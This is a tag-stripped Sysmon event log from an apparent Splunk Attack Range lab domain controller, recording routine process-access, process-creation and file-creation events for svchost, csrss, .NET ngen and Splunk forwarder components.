13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:44.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91BC-6005-0803-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.731{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91BC-6005-0803-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.732{59A5CD1D-91BC-6005-0803-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:44.341{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91BC-6005-0703-00000000A301}3392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:44.341{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BC-6005-0703-00000000A301}3392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:44.341{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91BC-6005-0703-00000000A301}3392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:44.247{59A5CD1D-91BB-6005-0603-00000000A301}3460C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d84-0\System.Drawing.dll2021-01-18 13:48:44.247 10341000x80000000000000007276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.559{59A5CD1D-91BD-6005-0A03-00000000A301}44483896C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91BD-6005-0A03-00000000A301}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BD-6005-0A03-00000000A301}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91BD-6005-0A03-00000000A301}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-91BD-6005-0A03-00000000A301}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91BE-6005-0B03-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
